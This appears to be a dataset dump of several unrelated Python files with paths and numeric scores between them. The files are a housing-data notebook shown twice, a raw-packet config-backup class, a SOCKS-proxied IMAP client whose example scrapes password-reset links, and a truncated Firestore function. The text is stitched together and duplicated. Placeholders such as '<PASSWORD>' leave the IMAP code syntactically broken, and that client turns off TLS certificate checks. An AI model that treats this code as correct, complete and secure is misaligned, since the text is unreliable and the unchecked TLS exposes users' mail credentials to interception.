HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
#%%
fetch_housing_data()
#%%
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
#%%
housing = load_housing_data()
housing.head()
#%%
housing.info()
#%%
housing["ocean_proximity"].value_counts()
#%%
housing.describe()
#%%
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
save_fig("attribute_histogram_plots")
plt.show()
#%%
#%%
#%%
#%%
#%%
#%%
#%%
#%% | Chapter02.py | import os
os.getcwd()
#%%
os.chdir("C:\\Users\\LEEMK\\Downloads\\handson-ml-master")
#%%
# 파이썬 2와 파이썬 3 지원
from __future__ import division, print_function, unicode_literals
# 공통
import numpy as np
import os
# 일관된 출력을 위해 유사난수 초기화
np.random.seed(42)
# 맷플롯립 설정
%matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
# 한글출력
matplotlib.rc('font', family='NanumBarunGothic')
plt.rcParams['axes.unicode_minus'] = False
# 그림을 저장할 폴드
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "end_to_end_project"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
#%%
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
#%%
fetch_housing_data()
#%%
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
#%%
housing = load_housing_data()
housing.head()
#%%
housing.info()
#%%
housing["ocean_proximity"].value_counts()
#%%
housing.describe()
#%%
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
save_fig("attribute_histogram_plots")
plt.show()
#%%
#%%
#%%
#%%
#%%
#%%
#%%
#%% | 0.121908 | 0.282073 |
from flask_sqlalchemy import SQLAlchemy
from CTFd import models
from socket import inet_aton, inet_ntoa
from struct import unpack, pack
from struct import *
from time import ctime,sleep
from os import system
from CTFd.models import *
import socket
import struct
import ctypes
import datetime
import thread, time
import Transport
from generalfunction import GenerateSN,GeneratePacketHeader,Confirm
#1.2.40
class BackupConfigFile():
def __init__(self, id,dest_host,parameters,target ):
self.id = id
self.dest_host = dest_host
self.target = target
self.sn = GenerateSN()
# data of packet
self.FunCode = 254
self.Param1 = 254
self.Param2 = 6
self.Command_Code = 78
self.File_Type = parameters[0]#int
self.Offset = parameters[1] #string
self.flag = 128
self.filepath = parameters[2]
def PackContent(self):
buf = ctypes.create_string_buffer(16) ###change the size
struct.pack_into('!BBHBB', buf, 0, self.FunCode, self.Param1, self.Param2, self.Command_Code, self.File_Type)
struct.pack_into('L', buf, 6, self.Offset)
struct.pack_into('!B', buf, 10, self.flag)
return buf.raw
def PackPacket(self):
#sn = GenerateSN()
snh = struct.pack("!L", self.sn)
PacketHeader = GeneratePacketHeader(self.target, self.dest_host)
PacketContent = self.PackContent()
confirmh = Confirm()
packet_send = snh + PacketHeader + PacketContent + confirmh
return packet_send
def ParsePacket(self, packet_receive):
ip_header = packet_receive[0:20]
ip_protocol = unpack('!B',ip_header[9])[0]
if ip_protocol != 254:
return None
snh = packet_receive[20:24]
sn = unpack('!L', snh)[0]
if sn != self.sn + 1:
return None
content_receive_head_pack = packet_receive[152:156]
content_receive_head = unpack('!BBH' , content_receive_head_pack)
FunCode = content_receive_head[0]
if FunCode != self.FunCode:
return None
Param = content_receive_head[1] #P=S
Length = content_receive_head[2] #L=Command_Code
content_receive_general_resp = unpack('!BB' , packet_receive[156:158])
Return_Code = content_receive_general_resp[0]
Status = content_receive_general_resp[1]
if Return_Code != self.Command_Code + 1:
return None
Flag = 0
Data_Len = 0
if Status == 0:
content_receive_data_pack = packet_receive[160:160+2051]
Flag = unpack('B',content_receive_data_pack[0])[0]
Data_Len = unpack('H',content_receive_data_pack[1:3])[0]
Data = unpack('!' + str(Data_Len) + 's', content_receive_data_pack[3 : 3 + Data_Len])[0]
file = open(self.filepath,'a')
file.write(Data)
file.close()
return [Status, Flag, Data_Len]
def SendAndReceive(self):
packet_send = self.PackPacket()
packet_receive = Transport.SocketTransport(packet_send, self.dest_host, self.sn)
if packet_receive == None: ## time out
return [-2, 0, 0]
status = self.ParsePacket(packet_receive)
if status == None:
return [-1, 0 ,0]
else:
return status | CTFd/privatesecurity.py | from flask_sqlalchemy import SQLAlchemy
from CTFd import models
from socket import inet_aton, inet_ntoa
from struct import unpack, pack
from struct import *
from time import ctime,sleep
from os import system
from CTFd.models import *
import socket
import struct
import ctypes
import datetime
import thread, time
import Transport
from generalfunction import GenerateSN,GeneratePacketHeader,Confirm
#1.2.40
class BackupConfigFile():
def __init__(self, id,dest_host,parameters,target ):
self.id = id
self.dest_host = dest_host
self.target = target
self.sn = GenerateSN()
# data of packet
self.FunCode = 254
self.Param1 = 254
self.Param2 = 6
self.Command_Code = 78
self.File_Type = parameters[0]#int
self.Offset = parameters[1] #string
self.flag = 128
self.filepath = parameters[2]
def PackContent(self):
buf = ctypes.create_string_buffer(16) ###change the size
struct.pack_into('!BBHBB', buf, 0, self.FunCode, self.Param1, self.Param2, self.Command_Code, self.File_Type)
struct.pack_into('L', buf, 6, self.Offset)
struct.pack_into('!B', buf, 10, self.flag)
return buf.raw
def PackPacket(self):
#sn = GenerateSN()
snh = struct.pack("!L", self.sn)
PacketHeader = GeneratePacketHeader(self.target, self.dest_host)
PacketContent = self.PackContent()
confirmh = Confirm()
packet_send = snh + PacketHeader + PacketContent + confirmh
return packet_send
def ParsePacket(self, packet_receive):
ip_header = packet_receive[0:20]
ip_protocol = unpack('!B',ip_header[9])[0]
if ip_protocol != 254:
return None
snh = packet_receive[20:24]
sn = unpack('!L', snh)[0]
if sn != self.sn + 1:
return None
content_receive_head_pack = packet_receive[152:156]
content_receive_head = unpack('!BBH' , content_receive_head_pack)
FunCode = content_receive_head[0]
if FunCode != self.FunCode:
return None
Param = content_receive_head[1] #P=S
Length = content_receive_head[2] #L=Command_Code
content_receive_general_resp = unpack('!BB' , packet_receive[156:158])
Return_Code = content_receive_general_resp[0]
Status = content_receive_general_resp[1]
if Return_Code != self.Command_Code + 1:
return None
Flag = 0
Data_Len = 0
if Status == 0:
content_receive_data_pack = packet_receive[160:160+2051]
Flag = unpack('B',content_receive_data_pack[0])[0]
Data_Len = unpack('H',content_receive_data_pack[1:3])[0]
Data = unpack('!' + str(Data_Len) + 's', content_receive_data_pack[3 : 3 + Data_Len])[0]
file = open(self.filepath,'a')
file.write(Data)
file.close()
return [Status, Flag, Data_Len]
def SendAndReceive(self):
packet_send = self.PackPacket()
packet_receive = Transport.SocketTransport(packet_send, self.dest_host, self.sn)
if packet_receive == None: ## time out
return [-2, 0, 0]
status = self.ParsePacket(packet_receive)
if status == None:
return [-1, 0 ,0]
else:
return status | 0.377885 | 0.076201 |
import time
import random
import ssl
import imaplib
from email import message_from_bytes, message_from_string
from email.header import decode_header
from email.message import Message
from email.utils import parseaddr, parsedate_to_datetime
from typing import Any, List, Optional, Union, Dict
import arrow
import regex as re
from regex import Pattern
import socks
from pyatom.base.debug import Debugger
from pyatom.base.proxy import Proxy
from pyatom.config import ConfigManager
from pyatom.config import DIR_DEBUG
__all__ = ("PostfixImap",)
class SocksIMAP4(imaplib.IMAP4):
"""
IMAP Service through socks proxy
Note: PySocks(socks) lib required.
"""
PROXY_TYPES = {
"socks4": socks.PROXY_TYPE_SOCKS4,
"socks5": socks.PROXY_TYPE_SOCKS5,
"http": socks.PROXY_TYPE_HTTP,
}
def __init__(
self,
host: str,
port: int = imaplib.IMAP4_PORT, # type: ignore
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
self.host = host
self.port = port
self.proxy_addr = proxy_addr
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = <PASSWORD>
self.proxy_type = proxy_type
self.proxy_rdns = proxy_rdns
imaplib.IMAP4.__init__(self, host, port)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
"""create socket"""
return socks.create_connection(
(self.host, self.port),
timeout=timeout,
proxy_type=self.proxy_type,
proxy_addr=self.proxy_addr,
proxy_port=self.proxy_port,
proxy_rdns=self.proxy_rdns,
proxy_username=self.proxy_username,
proxy_password=self.proxy_password,
)
class SocksIMAP4SSL(SocksIMAP4):
# pylint: disable=too-many-arguments
"""Socks imaplib ssl version"""
def __init__(
self,
host: str = "",
port: int = imaplib.IMAP4_SSL_PORT, # type: ignore
keyfile: Any = None,
certfile: Any = None,
ssl_context: Any = None,
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
if ssl_context is not None:
if keyfile is not None:
msg = "arguments are mutually exclusive: ssl_context, keyfile"
raise ValueError(msg)
if certfile is not None:
msg = "arguments are mutually exclusive: ssl_context, certfile"
raise ValueError(msg)
self.keyfile = keyfile
self.certfile = certfile
if ssl_context is None:
ssl_context = ssl._create_unverified_context(
certfile=certfile, keyfile=keyfile
) # type: ignore
self.ssl_context = ssl_context
SocksIMAP4.__init__(
self,
host=host,
port=port,
proxy_addr=proxy_addr,
proxy_port=proxy_port,
proxy_username=proxy_username,
proxy_password=proxy_password,
proxy_type=proxy_type,
proxy_rdns=proxy_rdns,
)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
sock = SocksIMAP4._create_socket(self, timeout=timeout)
server_host = self.host if ssl.HAS_SNI else None
return self.ssl_context.wrap_socket(sock, server_hostname=server_host)
def open(
self,
host: str = "",
port: int = imaplib.IMAP4_PORT, # type: ignore
timeout: Optional[float] = None,
) -> Any:
SocksIMAP4.open(self, host, port, timeout)
class ImapClient:
"""Imap Client"""
__slots__ = (
"host",
"port",
"usr",
"pwd",
"ssl",
"demo",
"proxy",
"debugger",
"folders",
"conn",
"encoding",
)
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
ssl_enable: bool = True,
demo: bool = True,
proxy: Optional[Proxy] = None,
debugger: Optional[Debugger] = None,
encoding: str = "unicode_escape",
) -> None:
self.host = host
self.port = port
self.usr = usr
self.pwd = <PASSWORD>
self.ssl = ssl_enable
self.demo = demo
self.proxy = proxy
self.debugger = debugger
self.encoding = encoding
self.folders = ["Inbox"]
self.conn: Any = None
def log(self, message: Any) -> None:
"""logging message if demo is True"""
if self.demo is True:
now = arrow.now().format("YYYY-MM-DD HH:mm:ss")
print(f"{now} - {message}")
def login(self) -> bool:
"""login using imaplib custom"""
if self.proxy:
if self.ssl:
self.conn = SocksIMAP4SSL(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
self.conn = SocksIMAP4(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
if self.ssl:
self.conn = imaplib.IMAP4_SSL(self.host, self.port)
else:
self.conn = imaplib.IMAP4(self.host, self.port)
if self.demo is True:
self.conn.debug = 4
return bool(self.conn.login(self.usr, self.pwd))
def logout(self) -> bool:
"""logout for imaplib"""
if self.conn and self.conn.close():
return bool(self.conn.lougout())
return False
@staticmethod
def is_bytes(obj: Any) -> bool:
"""check is bytes or not"""
try:
obj.decode()
return True
except AttributeError:
return False
def be_str(self, obj: Union[str, bytes]) -> str:
"""ensure bytes to be string"""
if isinstance(obj, bytes):
return obj.decode(encoding=self.encoding, errors="ignore")
return obj
@staticmethod
def guess_charset(msg: Message) -> str:
"""guess charset for email message"""
charset = ""
guess = msg.get_charsets()
if guess is None:
content_type = msg.get("Content-Type") or ""
content_type = content_type.lower().replace('"', "")
pattern = re.compile(r"(?<=charset=)[\w\-]+")
result = pattern.search(content_type)
if result:
charset = result.group()
return charset
def get_uids(self, folder: str, query: str) -> List[str]:
"""search to get list of email uids"""
if self.conn:
flag, data = self.conn.select(folder)
if flag == "OK":
time.sleep(random.uniform(0.05, 0.10))
flag, data = self.conn.search(None, query)
if flag == "OK":
return [x.decode() for x in data[0].split()]
return []
def get_msg(self, uid: str, timestamp: int = 0) -> dict:
"""read email message by uid, may filter by timestamp"""
result: Dict[str, str] = {}
if not self.conn:
return result
_, data = self.conn.fetch(uid, "(RFC822)")
if not _ == "OK" or data is None or data[0] is None:
return result
item = data[0][1]
if self.is_bytes(item):
msg = message_from_bytes(bytes(item))
else:
msg = message_from_string(str(item))
e_date = msg["Date"]
time_stamp = parsedate_to_datetime(e_date).timestamp()
if time_stamp and timestamp and time_stamp < timestamp:
return result
_, e_from = parseaddr(msg["From"])
_, e_to = parseaddr(msg["To"])
e_sub = decode_header(msg["Subject"])[0][0].decode(
encoding=self.encoding, errors="ignore"
)
self.log(f"Raw date: {e_date}")
self.log(f"Subject: {e_sub}")
self.log(f"From: {e_from}")
self.log(f"To: {e_to}")
while msg.is_multipart():
msg = msg.get_payload(0)
e_body = msg.get_payload(decode=True)
charset = self.guess_charset(msg)
if charset:
e_body = e_body.decode(charset)
else:
e_body = e_body.decode()
e_date = self.be_str(msg["Date"])
e_sub = self.be_str(e_sub)
e_from = self.be_str(e_from)
e_to = self.be_str(e_to)
return {
"uid": uid,
"date": e_date,
"subject": e_sub,
"from": e_from,
"to": e_to,
"body": e_body,
}
def lookup(
self, query: str, pattern: Pattern, timestamp: int = 0, debug: bool = False
) -> list:
"""lookup through mailbox and filter email content by regex"""
result = []
for folder in self.folders:
uids = self.get_uids(folder, query)
for index, uid in enumerate(reversed(uids)):
self.log(f"<index={index}> - <uid={uid}>")
msg_data = self.get_msg(uid, timestamp)
if not msg_data:
continue
if debug:
print(f"index={index} - uid={uid}")
print(msg_data)
if self.debugger:
self.debugger.id_add()
self.debugger.save(msg_data)
if not pattern:
continue
res = pattern.findall(msg_data["body"])
result.extend(res)
return list(set(result))
class PostfixImap(ImapClient):
"""Postfix Email Imap Client"""
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
proxy: Optional[Proxy] = None,
ssl_enable: bool = True,
demo: bool = True,
encoding: str = "unicode_escape",
) -> None:
super().__init__(
host=host,
port=port,
usr=usr,
pwd=<PASSWORD>,
proxy=proxy,
ssl_enable=ssl_enable,
demo=demo,
encoding=encoding,
)
@staticmethod
def _date_str(time_stamp: int = 0, days: int = 1) -> str:
"""generate date str"""
fmt = "D-MMM-YYYY"
if time_stamp:
return arrow.get(time_stamp).format(fmt)
return arrow.now().shift(days=-days).format(fmt)
def search(
self,
from_email: str,
to_email: str,
subject: str,
pattern: re.Pattern,
time_stamp: int = 0,
retry: int = 6,
debug: bool = False,
) -> List[str]:
"""search email by various filters"""
date_str = self._date_str(time_stamp=time_stamp)
query = f'(SINCE {date_str} FROM "{from_email}" TO "{to_email}" SUBJECT "{subject}")'
query = f'SUBJECT "{subject}"'
for _ in range(retry):
if self.login():
results = self.lookup(query, pattern, time_stamp, debug)
if results:
return results
if debug:
break
time.sleep(60)
return []
def example(self) -> List[str]:
"""
show case for search substack password reset url
Note: ts <= 365 days
"""
# from_email = "<EMAIL>"
# to_email = "<EMAIL>"
# subject = "Set your password for Substack"
# pattern = r'(http:\/\/email\.mg1\.substack\.com\/c\/[\S]+?)"'
from_email = "<EMAIL>"
to_email = "<EMAIL>"
subject = "just another testing"
pattern = r"someone else"
pattern = re.compile(pattern, re.I)
time_stamp = int(arrow.now().shift(days=-365).timestamp())
return self.search(
from_email,
to_email,
subject,
pattern,
time_stamp=time_stamp,
retry=6,
debug=True,
)
class TestImap:
"""TestCase for Imap Client."""
file_config = DIR_DEBUG.parent / "protect" / "config.json"
config = ConfigManager().load(file_config)
def to_client(self) -> PostfixImap:
"""Get PostfixImap Client."""
return PostfixImap(
host=self.config.postfix_domain,
port=self.config.postfix_port_imap,
usr=self.config.postfix_usr,
pwd=self.config.postfix_pwd,
proxy=Proxy.load(url=self.config.proxy_url),
)
def test_postfiximap(self) -> None:
"""test PostfixImap"""
client = self.to_client()
result = client.example()
print(result)
assert result
if __name__ == "__main__":
TestImap() | pyatom/client/imap.py |
import time
import random
import ssl
import imaplib
from email import message_from_bytes, message_from_string
from email.header import decode_header
from email.message import Message
from email.utils import parseaddr, parsedate_to_datetime
from typing import Any, List, Optional, Union, Dict
import arrow
import regex as re
from regex import Pattern
import socks
from pyatom.base.debug import Debugger
from pyatom.base.proxy import Proxy
from pyatom.config import ConfigManager
from pyatom.config import DIR_DEBUG
__all__ = ("PostfixImap",)
class SocksIMAP4(imaplib.IMAP4):
"""
IMAP Service through socks proxy
Note: PySocks(socks) lib required.
"""
PROXY_TYPES = {
"socks4": socks.PROXY_TYPE_SOCKS4,
"socks5": socks.PROXY_TYPE_SOCKS5,
"http": socks.PROXY_TYPE_HTTP,
}
def __init__(
self,
host: str,
port: int = imaplib.IMAP4_PORT, # type: ignore
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
self.host = host
self.port = port
self.proxy_addr = proxy_addr
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = <PASSWORD>
self.proxy_type = proxy_type
self.proxy_rdns = proxy_rdns
imaplib.IMAP4.__init__(self, host, port)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
"""create socket"""
return socks.create_connection(
(self.host, self.port),
timeout=timeout,
proxy_type=self.proxy_type,
proxy_addr=self.proxy_addr,
proxy_port=self.proxy_port,
proxy_rdns=self.proxy_rdns,
proxy_username=self.proxy_username,
proxy_password=self.proxy_password,
)
class SocksIMAP4SSL(SocksIMAP4):
# pylint: disable=too-many-arguments
"""Socks imaplib ssl version"""
def __init__(
self,
host: str = "",
port: int = imaplib.IMAP4_SSL_PORT, # type: ignore
keyfile: Any = None,
certfile: Any = None,
ssl_context: Any = None,
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
if ssl_context is not None:
if keyfile is not None:
msg = "arguments are mutually exclusive: ssl_context, keyfile"
raise ValueError(msg)
if certfile is not None:
msg = "arguments are mutually exclusive: ssl_context, certfile"
raise ValueError(msg)
self.keyfile = keyfile
self.certfile = certfile
if ssl_context is None:
ssl_context = ssl._create_unverified_context(
certfile=certfile, keyfile=keyfile
) # type: ignore
self.ssl_context = ssl_context
SocksIMAP4.__init__(
self,
host=host,
port=port,
proxy_addr=proxy_addr,
proxy_port=proxy_port,
proxy_username=proxy_username,
proxy_password=proxy_password,
proxy_type=proxy_type,
proxy_rdns=proxy_rdns,
)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
sock = SocksIMAP4._create_socket(self, timeout=timeout)
server_host = self.host if ssl.HAS_SNI else None
return self.ssl_context.wrap_socket(sock, server_hostname=server_host)
def open(
self,
host: str = "",
port: int = imaplib.IMAP4_PORT, # type: ignore
timeout: Optional[float] = None,
) -> Any:
SocksIMAP4.open(self, host, port, timeout)
class ImapClient:
"""Imap Client"""
__slots__ = (
"host",
"port",
"usr",
"pwd",
"ssl",
"demo",
"proxy",
"debugger",
"folders",
"conn",
"encoding",
)
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
ssl_enable: bool = True,
demo: bool = True,
proxy: Optional[Proxy] = None,
debugger: Optional[Debugger] = None,
encoding: str = "unicode_escape",
) -> None:
self.host = host
self.port = port
self.usr = usr
self.pwd = <PASSWORD>
self.ssl = ssl_enable
self.demo = demo
self.proxy = proxy
self.debugger = debugger
self.encoding = encoding
self.folders = ["Inbox"]
self.conn: Any = None
def log(self, message: Any) -> None:
"""logging message if demo is True"""
if self.demo is True:
now = arrow.now().format("YYYY-MM-DD HH:mm:ss")
print(f"{now} - {message}")
def login(self) -> bool:
"""login using imaplib custom"""
if self.proxy:
if self.ssl:
self.conn = SocksIMAP4SSL(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
self.conn = SocksIMAP4(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
if self.ssl:
self.conn = imaplib.IMAP4_SSL(self.host, self.port)
else:
self.conn = imaplib.IMAP4(self.host, self.port)
if self.demo is True:
self.conn.debug = 4
return bool(self.conn.login(self.usr, self.pwd))
def logout(self) -> bool:
"""logout for imaplib"""
if self.conn and self.conn.close():
return bool(self.conn.lougout())
return False
@staticmethod
def is_bytes(obj: Any) -> bool:
"""check is bytes or not"""
try:
obj.decode()
return True
except AttributeError:
return False
def be_str(self, obj: Union[str, bytes]) -> str:
"""ensure bytes to be string"""
if isinstance(obj, bytes):
return obj.decode(encoding=self.encoding, errors="ignore")
return obj
@staticmethod
def guess_charset(msg: Message) -> str:
"""guess charset for email message"""
charset = ""
guess = msg.get_charsets()
if guess is None:
content_type = msg.get("Content-Type") or ""
content_type = content_type.lower().replace('"', "")
pattern = re.compile(r"(?<=charset=)[\w\-]+")
result = pattern.search(content_type)
if result:
charset = result.group()
return charset
def get_uids(self, folder: str, query: str) -> List[str]:
"""search to get list of email uids"""
if self.conn:
flag, data = self.conn.select(folder)
if flag == "OK":
time.sleep(random.uniform(0.05, 0.10))
flag, data = self.conn.search(None, query)
if flag == "OK":
return [x.decode() for x in data[0].split()]
return []
def get_msg(self, uid: str, timestamp: int = 0) -> dict:
"""read email message by uid, may filter by timestamp"""
result: Dict[str, str] = {}
if not self.conn:
return result
_, data = self.conn.fetch(uid, "(RFC822)")
if not _ == "OK" or data is None or data[0] is None:
return result
item = data[0][1]
if self.is_bytes(item):
msg = message_from_bytes(bytes(item))
else:
msg = message_from_string(str(item))
e_date = msg["Date"]
time_stamp = parsedate_to_datetime(e_date).timestamp()
if time_stamp and timestamp and time_stamp < timestamp:
return result
_, e_from = parseaddr(msg["From"])
_, e_to = parseaddr(msg["To"])
e_sub = decode_header(msg["Subject"])[0][0].decode(
encoding=self.encoding, errors="ignore"
)
self.log(f"Raw date: {e_date}")
self.log(f"Subject: {e_sub}")
self.log(f"From: {e_from}")
self.log(f"To: {e_to}")
while msg.is_multipart():
msg = msg.get_payload(0)
e_body = msg.get_payload(decode=True)
charset = self.guess_charset(msg)
if charset:
e_body = e_body.decode(charset)
else:
e_body = e_body.decode()
e_date = self.be_str(msg["Date"])
e_sub = self.be_str(e_sub)
e_from = self.be_str(e_from)
e_to = self.be_str(e_to)
return {
"uid": uid,
"date": e_date,
"subject": e_sub,
"from": e_from,
"to": e_to,
"body": e_body,
}
    def lookup(
        self, query: str, pattern: Pattern, timestamp: int = 0, debug: bool = False
    ) -> list:
        """lookup through mailbox and filter email content by regex

        Iterates every folder in self.folders, fetches matching uids newest
        first, optionally persists each message via self.debugger, and
        collects all regex matches from message bodies. Returns the
        de-duplicated matches (order not preserved because of set()).
        """
        result = []
        for folder in self.folders:
            uids = self.get_uids(folder, query)
            # reversed(): server returns uids oldest-first, we want newest-first
            for index, uid in enumerate(reversed(uids)):
                self.log(f"<index={index}> - <uid={uid}>")
                msg_data = self.get_msg(uid, timestamp)
                if not msg_data:
                    # fetch failed or message older than *timestamp*
                    continue
                if debug:
                    print(f"index={index} - uid={uid}")
                    print(msg_data)
                if self.debugger:
                    self.debugger.id_add()
                    self.debugger.save(msg_data)
                if not pattern:
                    continue
                res = pattern.findall(msg_data["body"])
                result.extend(res)
        return list(set(result))
class PostfixImap(ImapClient):
    """Postfix Email Imap Client.

    Thin subclass of ImapClient adding a retrying ``search`` helper and a
    demo ``example`` lookup.
    """
    def __init__(
        self,
        host: str,
        port: int,
        usr: str,
        pwd: str,
        proxy: Optional[Proxy] = None,
        ssl_enable: bool = True,
        demo: bool = True,
        encoding: str = "unicode_escape",
    ) -> None:
        # Pass the credential straight through. The original source carried
        # a "<PASSWORD>" redaction placeholder here, which is invalid syntax.
        super().__init__(
            host=host,
            port=port,
            usr=usr,
            pwd=pwd,
            proxy=proxy,
            ssl_enable=ssl_enable,
            demo=demo,
            encoding=encoding,
        )
    @staticmethod
    def _date_str(time_stamp: int = 0, days: int = 1) -> str:
        """Generate an IMAP-format date string (e.g. 1-Jan-2021).

        Uses *time_stamp* when given, otherwise now shifted back *days* days.
        """
        fmt = "D-MMM-YYYY"
        if time_stamp:
            return arrow.get(time_stamp).format(fmt)
        return arrow.now().shift(days=-days).format(fmt)
    def search(
        self,
        from_email: str,
        to_email: str,
        subject: str,
        pattern: re.Pattern,
        time_stamp: int = 0,
        retry: int = 6,
        debug: bool = False,
    ) -> List[str]:
        """Search the mailbox, retrying up to *retry* times (60s apart).

        Returns regex matches found in matching message bodies, [] on failure.
        """
        date_str = self._date_str(time_stamp=time_stamp)
        query = f'(SINCE {date_str} FROM "{from_email}" TO "{to_email}" SUBJECT "{subject}")'
        # NOTE(review): the next line overwrites the full query above, so the
        # SINCE/FROM/TO filters are currently dead code. Kept to preserve
        # behavior -- confirm whether the subject-only query is intended.
        query = f'SUBJECT "{subject}"'
        for _ in range(retry):
            if self.login():
                results = self.lookup(query, pattern, time_stamp, debug)
                if results:
                    return results
            if debug:
                # no retries/sleep while debugging
                break
            time.sleep(60)
        return []
    def example(self) -> List[str]:
        """
        show case for search substack password reset url
        Note: ts <= 365 days
        """
        # from_email = "<EMAIL>"
        # to_email = "<EMAIL>"
        # subject = "Set your password for Substack"
        # pattern = r'(http:\/\/email\.mg1\.substack\.com\/c\/[\S]+?)"'
        # "<EMAIL>" placeholders below are redactions from the original source
        from_email = "<EMAIL>"
        to_email = "<EMAIL>"
        subject = "just another testing"
        pattern = r"someone else"
        pattern = re.compile(pattern, re.I)
        time_stamp = int(arrow.now().shift(days=-365).timestamp())
        return self.search(
            from_email,
            to_email,
            subject,
            pattern,
            time_stamp=time_stamp,
            retry=6,
            debug=True,
        )
class TestImap:
    """TestCase for Imap Client."""
    # NOTE(review): class-level config load executes at import/collection
    # time and performs file I/O -- confirm this is intentional.
    file_config = DIR_DEBUG.parent / "protect" / "config.json"
    config = ConfigManager().load(file_config)
    def to_client(self) -> PostfixImap:
        """Get PostfixImap Client configured from the protected config file."""
        return PostfixImap(
            host=self.config.postfix_domain,
            port=self.config.postfix_port_imap,
            usr=self.config.postfix_usr,
            pwd=self.config.postfix_pwd,
            proxy=Proxy.load(url=self.config.proxy_url),
        )
    def test_postfiximap(self) -> None:
        """test PostfixImap end-to-end via the demo example() lookup"""
        client = self.to_client()
        result = client.example()
        print(result)
        assert result
if __name__ == "__main__":
TestImap() | 0.67822 | 0.066812 |
import base64
import datetime
import json
import logging
import os
from typing import Any, Dict, Optional
from google.cloud import firestore
from google.cloud.functions_v1.context import Context
import google.cloud.logging
import pytz
# Set-up logging
client = google.cloud.logging.Client()
handler = google.cloud.logging.handlers.CloudLoggingHandler(client)
logger = logging.getLogger('cloudLogger')
logger.setLevel(logging.DEBUG) # defaults to WARN
logger.addHandler(handler)
COLLECTION_NAME = '{}_{}_{}'.format(
os.getenv('DEPLOYMENT_NAME', ''), os.getenv('SOLUTION_PREFIX', ''),
os.getenv('FST_LONG_RUNNING_TASKS_COLLECTION', ''))
DEFAULT_GCP_PROJECT = os.getenv('DEFAULT_GCP_PROJECT', '')
DISCARD_TASKS_OLDER_THAN_HOURS = int(
os.getenv('DISCARD_TASKS_OLDER_THAN_HOURS', '3'))
def _insert_into_firestore(project, collection, msg):
    """Writes a message into Firestore.
    Args:
      project: String representing the GCP project to use for the firestore DB
      collection: String representing the firestore collection to use
      msg: JSON object to write as Firestore document
    """
    # firestore.Client's first positional parameter is the project id
    db = firestore.Client(project)
    # add() auto-generates the document id; the (update_time, ref) return
    # value is deliberately discarded
    _ = db.collection(collection).add(msg)
def main(event: Dict[str, Any],
         context: Optional[Context] = None):
  """Triggers writing a message into Firestore.
  Args:
    event (dict): The dictionary with data specific to this type of event. The
      `data` field contains the PubsubMessage message. The `attributes` field
